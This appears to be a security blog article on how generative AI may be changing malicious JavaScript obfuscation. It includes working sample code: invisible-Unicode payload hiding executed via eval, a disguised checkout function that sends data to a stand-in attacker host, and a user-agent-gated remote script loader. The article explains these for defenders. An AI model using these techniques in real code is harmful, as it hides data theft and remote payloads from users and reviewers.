
Has AI changed malicious script obfuscation techniques?

Obfuscation techniques have been changing since generative AI became widely available.

Code obfuscation is the practice of making computer code difficult to read and understand. Legitimate websites use it to protect their online assets and intellectual property, and cybercriminals use it to disguise their intentions and to make code written in languages that would otherwise be easy to read, like JavaScript, harder to reverse engineer. Analysts have noticed that code obfuscation techniques have started to change recently, and the suspicion is that criminals are using generative AI tools to improve their obfuscation.

Some of the standard, non-AI techniques used to obfuscate code and complicate analysis are:

  • Stripping whitespace and unnecessary characters to remove structure, like indentation.
  • Base64 encoding, which transforms binary data into strings of ASCII characters.
  • Nested layers of encoding schemes, like base64, percent-encoding, and escape sequences.
  • Random variable names that strip meaning from the code and disguise the developer’s intentions.
  • Reordered and complicated layout and control flow that makes the code harder to follow.
JavaScript code with whitespace and unnecessary characters removed
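
To make these concrete, here is a minimal before-and-after sketch combining several of the techniques above. The function, strings, and identifiers are invented for illustration:

```javascript
// Readable original (hypothetical):
function greetUser(name) {
  console.log('Hello, ' + name);
}

// The same logic after common non-AI obfuscation steps: whitespace
// stripped, the identifier replaced with a meaningless name, and the
// strings hidden behind base64, decoded at runtime with atob().
// atob('bG9n') === 'log', atob('SGVsbG8sIA==') === 'Hello, '
function _0x1a(_0x2b){console[atob('bG9n')](atob('SGVsbG8sIA==')+_0x2b);}
```

The obfuscated line does exactly what greetUser does, but every cue a reader would rely on, from names to strings to layout, has been stripped or encoded.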

Generative AI tools like ChatGPT have proven to be very good at deobfuscating code, so analysts have added them to their arsenal of reverse engineering tools. Research has also shown that generative AI is very good at code obfuscation, and malicious developers seem to have adopted a number of new obfuscation techniques since AI became widely available.

For example, Unicode whitespace obfuscation hides malicious code using invisible characters or characters that appear similar to standard ASCII characters. The method was first published in October 2024 and started appearing in malicious code just months later. It can be done without the aid of AI, but AI might make it easier to deploy.

JavaScript obfuscation using non-ASCII characters
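
One published variant of this idea hides code in invisible Hangul filler characters. Below is a hedged, simplified sketch of the concept rather than the exact published method: each bit of the payload is mapped to one of two invisible code points, producing a string that renders as blank space but can be decoded and executed.

```javascript
// Simplified illustration: smuggle a payload's bits into two invisible
// Unicode code points (U+3164 HANGUL FILLER, U+FFA0 HALFWIDTH HANGUL
// FILLER). The encoded string looks like empty space in most editors.
const INVISIBLE = ['\u3164', '\uFFA0'];

function hide(src) {
  let out = '';
  for (const ch of src) {
    const bits = ch.charCodeAt(0).toString(2).padStart(8, '0');
    for (const b of bits) out += INVISIBLE[Number(b)];
  }
  return out;
}

function reveal(hidden) {
  let bits = '';
  for (const ch of hidden) bits += ch === '\uFFA0' ? '1' : '0';
  let src = '';
  for (let i = 0; i < bits.length; i += 8) {
    src += String.fromCharCode(parseInt(bits.slice(i, i + 8), 2));
  }
  return src;
}

const hidden = hide('console.log("hi")'); // renders as blank space
eval(reveal(hidden));                     // executes the hidden payload
```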

Malicious sections of code often stand out like a sore thumb because of obfuscation, but AI obfuscation could be used to make those sections blend in more naturally. Research by Unit 42 has shown that obfuscation performed by Large Language Models (LLMs) produces lower text entropy (it looks less obviously manipulated) than obfuscation performed by non-AI tools, making AI-obfuscated code look less suspicious.
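Entropy here refers to Shannon entropy over the script's characters, one of the simplest heuristics scanners use to flag obfuscation. A minimal sketch of the measurement:

```javascript
// Shannon entropy (bits per character) over a script's text. Long runs
// of base64, hex, or randomized identifiers push the score up, which is
// a classic obfuscation signal; Unit 42's finding is that LLM-obfuscated
// code scores closer to ordinary hand-written code and slips past it.
function shannonEntropy(text) {
  const counts = new Map();
  for (const ch of text) counts.set(ch, (counts.get(ch) || 0) + 1);
  let entropy = 0;
  for (const n of counts.values()) {
    const p = n / text.length;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}

shannonEntropy('function add(a, b) { return a + b; }');   // typically lower
shannonEntropy('eval(atob("ZmV0Y2goJ2h0dHBzOi8vLi4u"))'); // typically higher
```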

Off-the-shelf, non-AI tools also obfuscate code in predictable ways, making their output relatively easy to detect as suspicious. One of the dangers of AI-driven obfuscation is that it can be used to create unique obfuscation patterns for each individual deployment.

AI tools can be trained to create organic-looking code with:

  • Variable names that seem contextually relevant but are actually meaningless.
  • String manipulation through splitting, concatenation, or encoding that appears intentional.
  • Control flow adjustments that significantly alter the code structure without affecting its logic.
  • Self-removing code which disappears after it’s used or when it is run in a virtualized environment.
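
A hypothetical sketch of the first three traits working together; every name, domain, and value below is invented:

```javascript
// The names suggest ordinary e-commerce logic but carry no real meaning,
// the string splitting reads like routine URL building while quietly
// assembling an exfiltration endpoint, and the branch looks like input
// validation while, for any numeric total, always executing.
function updateCheckout(cartTotal) {
  const sessionKey = ['cdn', 'example-attacker', 'com'].join('.'); // hypothetical host
  const endpoint = 'https' + '://' + sessionKey + '/metrics';
  if (cartTotal >= 0 || cartTotal < 0) {
    fetch(endpoint, { method: 'POST', body: String(cartTotal) });
  }
  return cartTotal;
}
```

Nothing in that snippet trips simple pattern matching: the identifiers fit the page's context, the entropy stays low, and the only suspicious part is the destination itself.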

AI-driven code obfuscation can also contain sections of code that are never used, but are designed to keep human analysts and AI tools occupied figuring out what they do. Analysts trying to deobfuscate these scripts with free AI tools could find themselves running out of resources, such as free-tier usage limits, before they have completed their work.

JavaScript code with a large section of code that is never used
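
A minimal sketch of the decoy pattern, with invented names: the elaborate function below is never called, but untangling it consumes exactly the kind of attention (or free-tier AI tokens) the attacker wants to waste.

```javascript
// Decoy: deriveLicenseKey is dead code. Its rounds look like a hash or
// cipher worth reversing, but the result is discarded and never used.
function deriveLicenseKey(seed) {
  let acc = seed >>> 0;
  for (let i = 0; i < 64; i++) {
    acc = Math.imul(acc, 2654435761) >>> 0;    // reads like a hash round
    acc ^= ((acc << 13) | (acc >>> 19)) >>> 0; // reads like a cipher step
  }
  return acc.toString(16);
}

// The only code that actually runs:
function realPayload() { /* the actual malicious logic would live here */ }
document.addEventListener('DOMContentLoaded', realPayload);
```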

Other techniques designed to make detection harder are likely to be made easier by AI too. With conditional execution, malicious code only triggers when a visitor meets a specific set of conditions, such as presenting a particular user-agent string. When those conditions are met, code is loaded from a third-party website under the attacker's control, or from cloud storage like OneDrive or Google Docs.
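A hedged sketch of such a conditional loader; the user-agent check and URL are invented placeholders:

```javascript
// The second stage is only fetched when the visitor matches a target
// profile, so sandboxes and crawlers that don't match see nothing.
if (navigator.userAgent.includes('Windows NT 10.0')) {
  const s = document.createElement('script');
  // Hypothetical attacker-controlled or cloud-storage-hosted URL:
  s.src = 'https://files.example.com/shared/analytics.js';
  document.head.appendChild(s);
}
```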

This tactic is only used by sophisticated groups and requires that the script loading the external file looks legitimate—a perfect use case for AI’s ability to generate malicious code that blends in.

For now, the extent to which AI is being used in obfuscation is hidden from us, but few doubt that it's going on, or that the AI arms race between obfuscators and deobfuscators is just getting started.